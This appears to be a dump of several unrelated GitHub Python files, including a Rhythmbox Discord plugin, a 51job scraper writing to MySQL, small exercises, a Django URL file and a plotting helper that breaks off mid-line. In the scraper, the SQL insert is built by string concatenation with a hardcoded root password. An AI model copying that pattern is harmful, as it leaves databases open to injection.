\"Unknown\",\r\n \"duration\": 0\r\n }\r\n\r\n album = playing_entry.get_string(RB.RhythmDBPropType.ALBUM)\r\n title = playing_entry.get_string(RB.RhythmDBPropType.TITLE)\r\n artist = playing_entry.get_string(RB.RhythmDBPropType.ARTIST)\r\n duration = playing_entry.get_ulong(RB.RhythmDBPropType.DURATION)\r\n\r\n # If there is anything with less than 2 characters, Discord won't show our presence\r\n # So, lets add a cool empty unicode character to the end\r\n if album and len(album) < 2:\r\n album = f\"{album}​\"\r\n if title and len(title) < 2:\r\n title = f\"{title}​\"\r\n if artist and len(artist) < 2:\r\n artist = f\"{artist}​\"\r\n\r\n print(f\"discord_status: album={album} artist={artist} title={title} len_al={len(album)} len_art={len(artist)} len_title={len(title)}\")\r\n return {\r\n \"album\": album or \"Unknown\",\r\n \"title\": title or \"Unknown\",\r\n \"artist\": artist or \"Unknown\",\r\n \"duration\": duration or 0\r\n }\r\n\r\n def update_rpc(self, sp, playing):\r\n if not playing and not sp.get_playing_entry():\r\n self.playing = False\r\n\r\n self.rpc.update(\r\n state=\"Playback Stopped\",\r\n details=\"Rhythmbox Status Plugin\",\r\n large_image=\"rhythmbox\",\r\n small_image=\"stop\",\r\n small_text=\"Stopped\"\r\n )\r\n else:\r\n song_info = self.get_current_song_info(sp)\r\n\r\n if self.streaming or self.stream_flag:\r\n self.rpc.update(\r\n state=song_info[\"title\"][0:127],\r\n details=\"Stream\",\r\n large_image=\"rhythmbox\",\r\n small_image=\"play\",\r\n small_text=\"Streaming\",\r\n start=int(time.time())\r\n )\r\n \r\n return\r\n\r\n self.playing = playing\r\n title = song_info[\"title\"]\r\n artist = song_info[\"artist\"]\r\n details = f\"{title} - {artist}\"\r\n pos = sp.get_playing_time().time\r\n start_time = int(time.time()) if self.settings[\"time_style\"] == 1 else int(time.time()) - pos\r\n end_time = (start_time + song_info[\"duration\"] - pos) if 
self.settings[\"time_style\"] == 1 else None\r\n\r\n self.rpc.update(\r\n state=song_info[\"album\"][0:127],\r\n details=details[0:127],\r\n large_image=\"rhythmbox\",\r\n small_image=\"play\" if playing else \"pause\",\r\n small_text=\"Playing\" if playing else \"Paused\",\r\n start=start_time if playing else None,\r\n end=end_time if playing else None\r\n )\r\n\r\n def on_playing_song_changed(self, sp, entry):\r\n print(f\"discord_status: playing song changed sp={sp} entry={entry}\")\r\n\r\n if not sp.get_playing_entry():\r\n return\r\n\r\n self.song_started_at = int(time.time())\r\n self.playing_date = self.song_started_at\r\n self.elapsed_time = 0\r\n current_song_info = self.get_current_song_info(sp)\r\n\r\n self.streaming = current_song_info[\"duration\"] == 0 and self.streaming\r\n \r\n self.update_rpc(sp, True)\r\n\r\n\r\n def on_playing_state_changed(self, sp, playing):\r\n print(f\"discord_status: playing state changed sp={sp} playing={playing}\")\r\n self.update_rpc(sp, playing)\r\n\r\n def on_elapsed_changed(self, sp, elapsed):\r\n print(f\"discord_status: elapsed changed sp={sp} elapsed={elapsed}\")\r\n\r\n if self.playing:\r\n self.playing_date += 1\r\n\r\n if self.playing_date - elapsed != self.song_started_at and elapsed != 0:\r\n self.playing_date = self.song_started_at + elapsed\r\n print(\"discord_status: elapsed changed too much\")\r\n self.update_rpc(sp, True)\r\n\r\n\r\n def on_playing_song_property_changed(self, sp, uri, property, old, newvalue):\r\n print(f\"discord_status: playing song property changed sp={sp} uri={uri} property={property} old={old} newvalue={newvalue}\")\r\n if property == \"rb:stream-song-title\":\r\n self.streaming = True\r\n self.update_rpc(sp, True)\r\n","repo_name":"ToppleKek/discord-rhythmbox-plugin","sub_path":"discord-status.py","file_name":"discord-status.py","file_ext":"py","file_size_in_byte":7364,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"94"} +{"seq_id":"8249966222","text":"# -*- coding: utf-8 -*- \n# Software: PyCharm\n# Author: df\n# CreateTime: 2022-08-05 14:29\n# file: pachong.py\nimport re # 正则表达式,进行文字匹配\nimport urllib.request, urllib.error # 制定url,获取网页数据 ,\nfrom urllib import parse # 用来解析web需要的字符串\nimport json\nimport pymysql # mysql操作\n\n\ndef main():\n serach = \"java开发\"\n # 处理中文字符搜索问题\n # keysword=parse.quote(serach)\n # 再进行转义才能达到链接里的效果:java%25E5%25BC%2580%25E5%258F%2591\n # 二次编码\n # newkeyword=parse.quote(keysword)\n dataList = getData()\n saveDB(dataList)\n\n\ndef askurl(url):\n # 模拟浏览器头部信息,像对应的url发送信息\n # 有时候403就放cookie就好使了\n head = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Edg/103.0.1264.77\",\n }\n request = urllib.request.Request(url=url, headers=head)\n html = \"\"\n try:\n reponse = urllib.request.urlopen(request);\n # 这里51job界面是gbk的模式,如果这里用utf-8则报错,为: 'utf-8' codec can't decode byte 0xa1 in position 293: invalid start byte\n html = reponse.read().decode(\"gbk\")\n # print(html)\n except urllib.error.URLError as e:\n if hasattr(e, \"code\"):\n print(e.code)\n if hasattr(e, \"reason\"):\n print(e.reason)\n return html;\n\n\n# 获取并解析数据\ndef getData():\n # htmlx=open(\"51job.html\",\"r\")\n # bs=BeautifulSoup(htmlx,\"html.parser\")\n # ss=bs.select(\"div\")\n # print(bs)\n serach = \"java开发\"\n keysword = parse.quote(parse.quote(serach))\n page = 0\n\n totalDataList = []\n\n # 循环分页处理,当查询不到数据就跳出循环\n while True:\n page = page + 1;\n url = 
\"https://search.51job.com/list/010000,000000,0000,00,9,99,\" + keysword + \",2,\" + str(page) + \".html\"\n html = askurl(url)\n print(\"baseUrl\", url)\n\n # 得到脚本数据里需要的数据,得到的数据就是一整个列表,取出下标0则可以进行遍历\n datas = re.findall('window.__SEARCH_RESULT__ =(.*?)', str(html))[0]\n # 转换json可以根据键值对获取数据\n json_data = json.loads(datas)\n engines = json_data['engine_jds']\n\n # 跳出死循环\n if len(engines) == 0:\n break\n\n for engine in engines:\n dataGroup = []\n # 招聘职位\n if engine.get(\"job_name\") == \"\":\n dataGroup.append(\" \")\n else:\n dataGroup.append(engine.get(\"job_name\"))\n # 公司名称\n if engine.get(\"company_name\") == \"\":\n dataGroup.append(\" \")\n else:\n dataGroup.append(engine.get(\"company_name\"))\n # 薪资范围\n if engine.get(\"providesalary_text\") == \"\":\n dataGroup.append(\" \")\n else:\n dataGroup.append(engine.get(\"providesalary_text\"))\n # 地点\n if engine.get(\"workarea_text\") == \"\":\n dataGroup.append(\" \")\n else:\n dataGroup.append(engine.get(\"workarea_text\"))\n # 公司类型\n if engine.get(\"companytype_text\") == \"\":\n dataGroup.append(\" \")\n else:\n dataGroup.append(engine.get(\"companytype_text\"))\n # 学历要求\n if engine.get(\"degreefrom\") == \"\":\n dataGroup.append(\"0\")\n else:\n dataGroup.append(engine.get(\"degreefrom\"))\n # 工作年限\n if engine.get(\"workyear\") == \"\":\n dataGroup.append(\"0\")\n else:\n dataGroup.append(engine.get(\"workyear\"))\n # 公司福利\n if engine.get(\"jobwelf\") == \"\":\n dataGroup.append(\" \")\n else:\n dataGroup.append(engine.get(\"jobwelf\"))\n\n # 公司规模\n if engine.get(\"companysize_text\") == \"\":\n dataGroup.append(\" \")\n else:\n dataGroup.append(engine.get(\"companysize_text\"))\n\n # 公司经营方向\n if engine.get(\"companyind_text\") == \"\":\n dataGroup.append(\" \")\n else:\n dataGroup.append(engine.get(\"companyind_text\"))\n\n # 发布时间\n if engine.get(\"updatedate\") == \"\":\n dataGroup.append(\" \")\n else:\n dataGroup.append(engine.get(\"updatedate\"))\n\n\n totalDataList.append(dataGroup)\n return totalDataList\n\n\ndef saveDB(dataList):\n conn = pymysql.connect(host=\"localhost\", user=\"root\", password=\"root\", port=3306, db='spider', charset=\"utf8\")\n cursor = conn.cursor()\n\n try:\n for data in dataList:\n for index in range(len(data)):\n if index == 6 or index == 5:\n continue\n data[index] = '\"' + str(data[index]) + '\"'\n\n sql = '''insert into 51job (job_name,company_name,providesalary_text,workarea_text,companytype_text,degreefrom,workyear,jobwelf,companysize_text,companyind_text,updatedate)\n values(%s)'''% \",\".join(data)\n print(sql)\n cursor.execute(sql)\n print(\"保存成功\")\n except Exception as result:\n print(result)\n conn.rollback()\n finally:\n conn.commit()\n cursor.close()\n conn.close()\n\n\n\ndef test():\n ss={\"name\":\"\"}\n print(ss.get(\"name\"))\n if ss.get(\"name\")==\"\":\n print(\"pp\")\n\n\nif __name__ == \"__main__\":\n #test()\n main()\n # parserData(\"\")\n","repo_name":"dufGIT/python-progect","sub_path":"51job/pachong.py","file_name":"pachong.py","file_ext":"py","file_size_in_byte":5732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"23657629773","text":"from collections import defaultdict\n\n#dfs\nclass Solution:\n def validPath(self, n: int, edges: List[List[int]], start: int, end: int) -> bool:\n s = []\n d = defaultdict(list)\n for i in edges:\n d[i[0]].append(i[1])\n d[i[1]].append(i[0])\n\n seen = set()\n s.append(start)\n\n while s:\n n = s.pop()\n if n == end:\n return True\n\n if n not in seen:\n seen.add(n)\n for i in 
d[n]:\n s.append(i)\n\n return False\n\n\n\n","repo_name":"salonikalsekar/LC","sub_path":"graph_theory/find_if_path_exists.py","file_name":"find_if_path_exists.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24504285834","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\n#Import Modules\nimport os\nimport csv\n\n\n# In[16]:\n\n\n#Build the path to the csv file\ncsv_path = os.path.join(\"Resources\",\"budget_data.csv\")\n\n#Open a file handler\nwith open(csv_path,\"r\",newline=\"\") as csv_file:\n \n #connect the csv file with a file reader\n csv_reader = csv.reader(csv_file, delimiter=\",\")\n \n #remove the header\n header = next(csv_reader)\n \n #define counters\n total_months = 0\n total_profit = 0\n first = 0\n first_iteration = True\n \n delta_list = []\n date_list = []\n \n for row in csv_reader:\n \n #Calculate the total months\n total_months += 1\n \n #Calculate total profit\n profit = int(row[1])\n total_profit += profit\n \n #Calculate the change\n second = int(row[1])\n delta = second - first\n \n #Skip the first calculation for delta as it is not a true delta\n if first_iteration == False:\n delta_list.append(delta)\n date_list.append(row[0])\n \n \n \n first_iteration = False\n first = second\n \n #Final Calculations\n max_change = max(delta_list)\n min_change = min(delta_list)\n average_change = round(sum(delta_list)/len(delta_list), 2)\n \n #Identify dates for max and min change\n index = 0\n for index in range(len(delta_list)):\n \n if int(delta_list[index]) == max_change:\n max_index = index\n \n \n if int(delta_list[index]) == min_change:\n min_index = index\n \n \n index += 1\n \nmax_date = date_list[max_index]\nmin_date = date_list[min_index]\n \n#Print report on terminal\nprint(\"Financial Analysis\")\nprint(\"---------------------------\")\nprint(f\"Total Months: {total_months}\")\nprint(f\"Total: ${total_profit}\")\nprint(f\"Average Change: ${average_change}\")\nprint(f\"Greatest Increase in Profits: {max_date} (${max_change})\")\nprint(f\"Greatest Decrease in Profits: {min_date} (${min_change})\")\n \n \noutput_file_path = os.path.join(\"Resources\", \"output.txt\")\n\nwith open(output_file_path,\"w\",newline = \"\") as output_file:\n \n output_file.write(\"Financial Analysis\\n\")\n output_file.write(\"-------------------------------\\n\")\n output_file.write(\"Total Months: \" + str(total_months) + \"\\n\")\n output_file.write(\"Total: $\" +str(total_profit) + \"\\n\")\n output_file.write(\"Average Change: $\" + str(average_change) + \"\\n\")\n output_file.write(\"Greatest Increase in Profits: \" + max_date + \" ($\" + str(max_change) + \")\\n\")\n output_file.write(\"Greatest Decrease in Profits: \" + min_date + \" ($\" + str(min_change) + \")\\n\")\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"ahmar-jamal/python-challenge","sub_path":"PyBank/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"43601376005","text":"from __future__ import annotations\n\nfrom abc import ABC, abstractmethod\nfrom collections.abc import Callable\nfrom typing import Generic, Self, TypeVar\n\nfrom ._exceptions import Error\n\n_T = TypeVar(\"_T\")\n_U = TypeVar(\"_U\")\n\n\nclass Receiver(ABC, Generic[_T]):\n \"\"\"A channel Receiver.\"\"\"\n\n async def __anext__(self) -> _T:\n \"\"\"Await the next value in the async iteration over received 
values.\n\n Returns:\n The next value received.\n\n Raises:\n StopAsyncIteration: if the receiver stopped producing messages.\n ReceiverError: if there is some problem with the receiver.\n \"\"\"\n try:\n await self.ready()\n return self.consume()\n except ReceiverStoppedError as exc:\n raise StopAsyncIteration() from exc\n\n @abstractmethod\n async def ready(self) -> bool:\n \"\"\"Wait until the receiver is ready with a value or an error.\n\n Once a call to `ready()` has finished, the value should be read with\n a call to `consume()` (`receive()` or iterated over). The receiver will\n remain ready (this method will return immediately) until it is\n consumed.\n\n Returns:\n Whether the receiver is still active.\n \"\"\"\n\n @abstractmethod\n def consume(self) -> _T:\n \"\"\"Return the latest value once `ready()` is complete.\n\n `ready()` must be called before each call to `consume()`.\n\n Returns:\n The next value received.\n\n Raises:\n ReceiverStoppedError: if the receiver stopped producing messages.\n ReceiverError: if there is some problem with the receiver.\n \"\"\"\n\n def __aiter__(self) -> Self:\n \"\"\"Initialize the async iterator over received values.\n\n Returns:\n `self`, since no extra setup is needed for the iterator.\n \"\"\"\n return self\n\n async def receive(self) -> _T:\n \"\"\"Receive a message from the channel.\n\n Returns:\n The received message.\n\n Raises:\n ReceiverStoppedError: if there is some problem with the receiver.\n ReceiverError: if there is some problem with the receiver.\n \"\"\"\n try:\n received = await self.__anext__() # pylint: disable=unnecessary-dunder-call\n except StopAsyncIteration as exc:\n # If we already had a cause and it was the receiver was stopped,\n # then reuse that error, as StopAsyncIteration is just an artifact\n # introduced by __anext__.\n if (\n isinstance(exc.__cause__, ReceiverStoppedError)\n # pylint is not smart enough to figure out we checked above\n # this is a ReceiverStoppedError and thus it does have\n # a receiver member\n and exc.__cause__.receiver is self # pylint: disable=no-member\n ):\n raise exc.__cause__\n raise ReceiverStoppedError(self) from exc\n return received\n\n def map(self, call: Callable[[_T], _U]) -> Receiver[_U]:\n \"\"\"Return a receiver with `call` applied on incoming messages.\n\n Args:\n call: function to apply on incoming messages.\n\n Returns:\n A `Receiver` to read results of the given function from.\n \"\"\"\n return _Map(self, call)\n\n\nclass ReceiverError(Error, Generic[_T]):\n \"\"\"An error produced in a [Receiver][frequenz.channels.Receiver].\n\n All exceptions generated by receivers inherit from this exception.\n \"\"\"\n\n def __init__(self, message: str, receiver: Receiver[_T]):\n \"\"\"Create an instance.\n\n Args:\n message: An error message.\n receiver: The [Receiver][frequenz.channels.Receiver] where the\n error happened.\n \"\"\"\n super().__init__(message)\n self.receiver: Receiver[_T] = receiver\n \"\"\"The receiver where the error happened.\"\"\"\n\n\nclass ReceiverStoppedError(ReceiverError[_T]):\n \"\"\"The [Receiver][frequenz.channels.Receiver] stopped producing messages.\"\"\"\n\n def __init__(self, receiver: Receiver[_T]):\n \"\"\"Create an instance.\n\n Args:\n receiver: The [Receiver][frequenz.channels.Receiver] where the\n error happened.\n \"\"\"\n super().__init__(f\"Receiver {receiver} was stopped\", receiver)\n\n\nclass _Map(Receiver[_U], Generic[_T, _U]):\n \"\"\"Apply a transform function on a channel receiver.\n\n Has two generic types:\n\n - The input type: 
value type in the input receiver.\n - The output type: return type of the transform method.\n \"\"\"\n\n def __init__(self, receiver: Receiver[_T], transform: Callable[[_T], _U]) -> None:\n \"\"\"Create a `Transform` instance.\n\n Args:\n receiver: The input receiver.\n transform: The function to run on the input data.\n \"\"\"\n self._receiver: Receiver[_T] = receiver\n \"\"\"The input receiver.\"\"\"\n\n self._transform: Callable[[_T], _U] = transform\n \"\"\"The function to run on the input data.\"\"\"\n\n async def ready(self) -> bool:\n \"\"\"Wait until the receiver is ready with a value or an error.\n\n Once a call to `ready()` has finished, the value should be read with\n a call to `consume()` (`receive()` or iterated over). The receiver will\n remain ready (this method will return immediately) until it is\n consumed.\n\n Returns:\n Whether the receiver is still active.\n \"\"\"\n return await self._receiver.ready() # pylint: disable=protected-access\n\n # We need a noqa here because the docs have a Raises section but the code doesn't\n # explicitly raise anything.\n def consume(self) -> _U: # noqa: DOC502\n \"\"\"Return a transformed value once `ready()` is complete.\n\n Returns:\n The next value that was received.\n\n Raises:\n ChannelClosedError: if the underlying channel is closed.\n \"\"\"\n return self._transform(\n self._receiver.consume()\n ) # pylint: disable=protected-access\n\n def __str__(self) -> str:\n \"\"\"Return a string representation of the timer.\"\"\"\n return f\"{type(self).__name__}:{self._receiver}:{self._transform}\"\n\n def __repr__(self) -> str:\n \"\"\"Return a string representation of the timer.\"\"\"\n return f\"{type(self).__name__}({self._receiver!r}, {self._transform!r})\"\n","repo_name":"frequenz-floss/frequenz-channels-python","sub_path":"src/frequenz/channels/_receiver.py","file_name":"_receiver.py","file_ext":"py","file_size_in_byte":6423,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"96"} +{"seq_id":"31010107394","text":"# -*- coding: utf-8 -*-\n# czatpro/czat/urls.py\n\nfrom django.conf.urls import url\nfrom czat import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^loguj/$', views.loguj, name='loguj'),\n url(r'^wyloguj/$', views.wyloguj, name='wyloguj'),\n url(r'^wiadomosci/$', views.wiadomosci, name='wiadomosci'),\n]\n","repo_name":"koduj-z-klasa/python101-py2","sub_path":"docs/webapps/czat/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"4896337911","text":"import os.path\r\nfrom itertools import islice\r\nimport ijson\r\nimport pandas as pd\r\nimport numpy as np\r\nimport torch\r\n\r\nfrom tqdm import tqdm\r\nfrom transformers import AutoTokenizer, AutoModel\r\nfrom sentence_transformers import SentenceTransformer\r\n\r\nfrom embeddings.utils import get_underscored_name, mkdirs\r\n\r\n\r\ndef get_embedding(text, model, tokenizer, model_type=\"specter\"):\r\n if model_type.startswith(\"specter_simcse\") : return torch.tensor(model.encode(text))\r\n else:\r\n inputs = tokenizer(text, padding=True, truncation=True, return_tensors=\"pt\", max_length=512)\r\n return model(**inputs).last_hidden_state[:, 0, :]\r\n\r\n\r\ndef get_scibert_model():\r\n tokenizer = AutoTokenizer.from_pretrained('allenai/scibert_scivocab_uncased')\r\n model = AutoModel.from_pretrained('allenai/scibert_scivocab_uncased')\r\n return model, tokenizer\r\n\r\n\r\ndef 
get_specter_model():\r\n tokenizer = AutoTokenizer.from_pretrained('allenai/specter')\r\n model = AutoModel.from_pretrained('allenai/specter')\r\n return model, tokenizer\r\n\r\n\r\ndef get_custom_model(model_dir: str):\r\n if not os.path.exists(model_dir):\r\n print(f\"Error while parsing: {model_dir}. Model path directory with this name does not exist!\")\r\n return None\r\n\r\n model = SentenceTransformer(model_dir)\r\n tokenizer = None\r\n return model, tokenizer\r\n\r\n\r\ndef get_model(model_type: str,\r\n custom_model_dir=\"\"):\r\n if model_type == \"specter\": return get_specter_model()\r\n if model_type in ['scibert_average', 'scibert_cls']: return get_scibert_model()\r\n if model_type.startswith(\"specter_simcse\"): return get_custom_model(custom_model_dir)\r\n print(\"Error!! Invalid model name in get_model()\")\r\n return None, None\r\n\r\n\r\ndef create_author_embeddings(author, model_name=\"specter\", model=[], tokenizer=[], in_or_out=\"in\"):\r\n if \"Publications\" not in author: return\r\n\r\n auth_underscore_name = get_underscored_name(author['romanize name'])\r\n fname_out = f'./author_embeddings/{model_name}_embeddings/{in_or_out}'\r\n emb_total = []\r\n mkdirs(fname_out)\r\n publication_texts = []\r\n\r\n print(f\"{auth_underscore_name}, total papers:{len(author['Publications'])}\")\r\n\r\n for paper in author['Publications']:\r\n try: title_abs = paper['Title'] + \" [SEP] \" + paper['Abstract'] if (\"Abstract\" in paper and paper[\"Abstract\"]) else paper['Title']\r\n except: title_abs = paper['title'] + \" [SEP] \" + paper['Abstract'] if (\"Abstract\" in paper and paper[\"Abstract\"]) else paper['title']\r\n publication_texts.append(title_abs)\r\n\r\n if model_name == \"specter\":\r\n for title_abs in publication_texts:\r\n emb_total.append(get_embedding(title_abs, model, tokenizer, model_name))\r\n else: emb_total = model.encode(publication_texts)\r\n\r\n pd.DataFrame(emb_total).to_csv(fname_out + f'/{auth_underscore_name}.csv', header=False, index=False)\r\n\r\n\r\nif __name__ == '__main__':\r\n pass\r\n","repo_name":"nikifori/Apella-plus-thesis","sub_path":"embeddings_py/sentence_transformer_models.py","file_name":"sentence_transformer_models.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"19745000718","text":"import sqlite3\nimport pandas as pd\nfrom tabulate import tabulate\n\ns_id = input('Service ID:')\n\ndef getDeveloperName(id):\n try:\n sqliteConnection = sqlite3.connect('/home/wnaina/Bureau/fanompo_script/fanompo.db')\n cursor = sqliteConnection.cursor()\n select_query = \"SELECT * FROM services where numSVC = ?\"\n fanome_query = \"SELECT max(c.Daty), m.membID, m.Fiantso, s.anarFohy from membres m \\\n join calend c on m.membID = c.mbID JOIN services s on \\\n c.svcID = s.numSVC where c.svcID=? group by m.Fiantso order by c.Daty desc\"\n memb_query = \"SELECT m.membID, m.Fiantso from membres m join fanome f on m.membID = f.mb \\\n where f.svc=? 
\"\n\n cursor.execute(select_query, (id,))\n name = cursor.fetchone()\n\n print(name)\n cursor.execute(fanome_query, (id,))\n fanome = cursor.fetchall()\n df=pd.DataFrame(fanome)\n cursor.execute(memb_query, (id,))\n memb = cursor.fetchall()\n dff=pd.DataFrame(memb)\n print(\"Isan ny Mpanao: \",len(memb))\n print(\"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\")\n print (tabulate(df,headers=[\"Daty\",\"Fiantso\",\"Service\"]))\n print(\"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\")\n print (tabulate(dff,headers=[\"Num\",\"Fiantso\"]))\n cursor.close()\n \n\n except sqlite3.Error as error:\n print(\"Failed to read data from sqlite table\", error)\n finally: \n sqliteConnection.close()\n print(\"sqlite connection is closed\")\n\ngetDeveloperName(s_id)","repo_name":"wraivo/djfanompo","sub_path":"Bureau/fanompo_script/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"2930623044","text":"import pandas\n\n[NAME, INIT, INIT_SD, REAN, REAN_SD, NOOPT, NOOPT_SD, CI, CI_SD, DI, DI_SD, WI, WI_SD, CIDI, CIDI_SD, CIWI, CIWI_SD, DIWI, DIWI_SD, CIDIWI, CIDIWI_SD] = range(21)\n# Preprocessing: first run tail +1 performance\\ generated.txt | grep -v \", ,\" > perf.csv\ndata = pandas.read_csv('perf.csv', header=None)\n\ndata_slower_than_100ms = data[data[INIT] >= 100]\n\n# Filter the data to only keep these benchmarks that have 5 variants.\n# This is less than optimal, but good enough\nactual_data = data_slower_than_100ms\nfor name in data_slower_than_100ms[NAME]:\n # Get the base name of the benchmark (remove the -1.scm part)\n basename = '-'.join(name.split('-')[:-1])\n count = len([name2 for name2 in data_slower_than_100ms[NAME] if name2.startswith(basename)])\n if count < 5:\n print('Removing %s' % name)\n actual_data = actual_data[actual_data[NAME] != name]\n\nprint(actual_data)","repo_name":"softwarelanguageslab/maf","sub_path":"scripts/Python/filterBenchData.py","file_name":"filterBenchData.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"96"} +{"seq_id":"21739713726","text":"import sys\r\nfrom collections import deque\r\nimport heapq\r\ninput = sys.stdin.readline\r\nn = int(input())\r\narr = [list(input().rstrip().split()) for _ in range(n)]\r\nba = []\r\nst = []\r\nfor i in range(n):\r\n for j in range(n):\r\n if arr[i][j] == \"X\": ba.append([i, j])\r\n elif arr[i][j] == \"S\": st.append([i, j])\r\nfor i in range(len(ba) - 2):\r\n arr[ba[i][0]][ba[i][1]] = \"B\"\r\n for j in range(i + 1, len(ba) - 1):\r\n arr[ba[j][0]][ba[j][1]] = \"B\"\r\n for k in range(j + 1, len(ba)):\r\n arr[ba[k][0]][ba[k][1]] = \"B\"\r\n flag = True\r\n for x, y in st:\r\n for z in range(y + 1, n):\r\n if arr[x][z] == \"T\": flag = False; break\r\n elif arr[x][z] == \"B\": break\r\n for z in range(y - 1, -1, -1):\r\n if arr[x][z] == \"T\": flag = False; break\r\n elif arr[x][z] == \"B\": break\r\n for z in range(x + 1, n):\r\n if arr[z][y] == \"T\": flag = False; break\r\n elif arr[z][y] == \"B\": break\r\n for z in range(x - 1, -1, -1):\r\n if arr[z][y] == \"T\": flag = False; break\r\n elif arr[z][y] == \"B\": break\r\n if flag: print(\"YES\"); exit(0)\r\n arr[ba[k][0]][ba[k][1]] = \"X\"\r\n arr[ba[j][0]][ba[j][1]] = \"X\"\r\n arr[ba[i][0]][ba[i][1]] = 
\"X\"\r\nprint(\"NO\")","repo_name":"secrett2633/replit_algorithm","sub_path":"백준/Gold/18428. 감시 피하기/감시 피하기.py","file_name":"감시 피하기.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"34638118463","text":"import os\nfrom collections.abc import Iterable\nfrom typing import Optional, Tuple, Union, List\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors as C\nfrom matplotlib.patches import Patch\nfrom PIL import Image as PILImage\n\nfrom .label_color import LabelColor\nfrom .utils import open_with_PIL\n\n\ndef overlay_masks(\n image: Union[os.PathLike, PILImage.Image, np.ndarray],\n boolean_masks: Union[np.ndarray, List[np.ndarray]],\n labels: Optional[List[str]] = None,\n colors: Optional[Union[np.ndarray, List[Union[str, List[float]]]]] = None,\n figsize: Tuple[int, int] = (8, 8),\n dpi: int = 90,\n mask_alpha: float = 0.4,\n mpl_colormap: str = \"tab20\",\n return_pil_image: bool = False,\n):\n \"\"\"Overlays masks on the image.\n Parameters\n ----------\n image : Union[str, PIL.Image.Image, np.ndarray]\n Image path or PIl.Image or numpy array. If image size inconsistent with\n the masks size, image will be resized.\n boolean_masks : List[np.ndarray[bool]]\n List of segmentation masks or numpy array of shape (height, width, n_classes).\n All masks should be the same size, equal to size of the image.\n labels : Optional[List[str]], optional\n Optional label names. Provide in the same order as the corresponding masks.\n If not provided, will be set as range(len(boolean_masks)), by default None\n colors : Union[np.ndarray, List[Union[str, List[float]]]], optional\n Array of shape (n_labels x 4) or list of matplotlib acceptable colornames.\n Example to get persistent colormap: `plt.cm.tab20(np.arange(NUM_LABELS))`\n figsize : tuple, optional\n Size in inches of the output image, by default (12, 12)\n dpi : int, optional\n Resolution of the output image. 
Note: 'px, py = w * dpi, h * dpi', by default 90\n    mask_alpha : float, optional\n        Mask opacity (alpha) value, by default 0.4\n    mpl_colormap : str\n        Matplotlib colormap name\n    return_pil_image : bool\n        If True, will return a PIL image instead of a matplotlib figure.\n\n    Returns\n    -------\n    plt.Figure | PIL.Image\n        Output mpl figure or pillow image with masks.\n    \"\"\"\n\n    if isinstance(boolean_masks, np.ndarray):\n        assert (boolean_masks.ndim == 3 and boolean_masks.dtype == bool), (\n            \"boolean_masks should be a list of boolean numpy\"\n            + \" arrays or a 3-dim numpy array with the last dim\"\n            + \" as a channel to store masks of different classes\"\n        )\n        boolean_masks = [boolean_masks[:, :, i] for i in range(boolean_masks.shape[-1])]\n\n    if labels is not None:\n        assert len(labels) == len(boolean_masks), (\n            \"Number of provided labels != number of masks\"\n        )\n    else:\n        labels = [f\"{_:02d}\" for _ in range(len(boolean_masks))]\n\n    pil_image = open_with_PIL(image)\n    image_size = tuple(np.array(pil_image.size)[::-1])\n\n    assert all(\n        mask.shape == image_size for mask in boolean_masks\n    ), \"Label mask size is not equal to image size\"\n\n    if colors is None:\n        cbar = LabelColor(\n            num_labels=len(boolean_masks),\n            alpha=mask_alpha,\n            return_legend_color=True,\n            mpl_colormap=mpl_colormap,\n        )\n\n    else:\n        assert len(colors) == len(boolean_masks), (\n            \"Number of provided colors != number of masks\"\n        )\n        if all(isinstance(c, str) for c in colors):\n            colors = [C.to_rgba(c) for c in colors]\n\n        if isinstance(colors, Iterable):\n            colors = np.array(colors)\n\n        assert colors.ndim == 2 and colors.shape[-1] == 4, (\n            \"Unsupported color format:\"\n            + \" should be list of matplotlib colorname strings for each mask/mask_channel,\"\n            + \" list of RGBA arrays or 2-dim numpy array of shape (n_labels x 4)\"\n        )\n\n        mask_colors = colors.copy()\n        mask_colors[:, -1] *= mask_alpha\n        mask_colors = (mask_colors * 255).astype(\"uint8\")\n        cbar = zip(mask_colors, colors)\n\n    segmentation_overlay = np.zeros((*image_size, 4), dtype=np.uint16)\n    segmentation_mask = np.zeros(image_size, dtype=bool)\n    legend_elements = []\n\n    for mask, label, (color, legend_color) in zip(boolean_masks, labels, cbar):\n\n        assert mask.dtype == \"bool\"\n\n        intersection = mask & segmentation_mask\n        segmentation_mask = mask | segmentation_mask\n\n        # Paint non-overlapping area\n        segmentation_overlay[mask ^ intersection] = color\n\n        # Blend overlapping area\n        segmentation_overlay[intersection] = (\n            segmentation_overlay[intersection] + color\n        ) / 2\n\n        legend_elements.append(Patch(color=legend_color, label=label))\n\n    segmentation_overlay = 